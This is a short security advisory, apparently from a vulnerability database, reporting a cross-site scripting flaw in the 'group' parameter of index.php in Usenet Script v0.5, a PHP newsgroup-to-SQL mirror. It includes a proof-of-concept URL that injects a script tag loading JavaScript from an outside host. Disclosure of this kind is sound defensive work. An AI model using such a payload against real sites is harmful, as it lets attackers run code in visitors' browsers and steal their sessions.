Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13334
HistoryJun 27, 2006 - 12:00 a.m.

Usenet Script v0.5

2006-06-2700:00:00
vulners.com
23
JSON

Usenet Script v0.5

Homepage:
http://www.metalhead.ws/usenet

Description:

"Those scripts allow you to mirror a Newsgroup in an SQL database. The development database was
Postgresql, but it uses dbx and should therefore be able to work with other database systems, too.
Furthermore, a frontend is provided."

Affected files:

index.php

XSS vuln via index.php on group var:

Data isnt properly sanatized before being generated.
http://www.example.com/index.php?group=<script src=http://www.youfucktard.com/xss.js></script>

JSON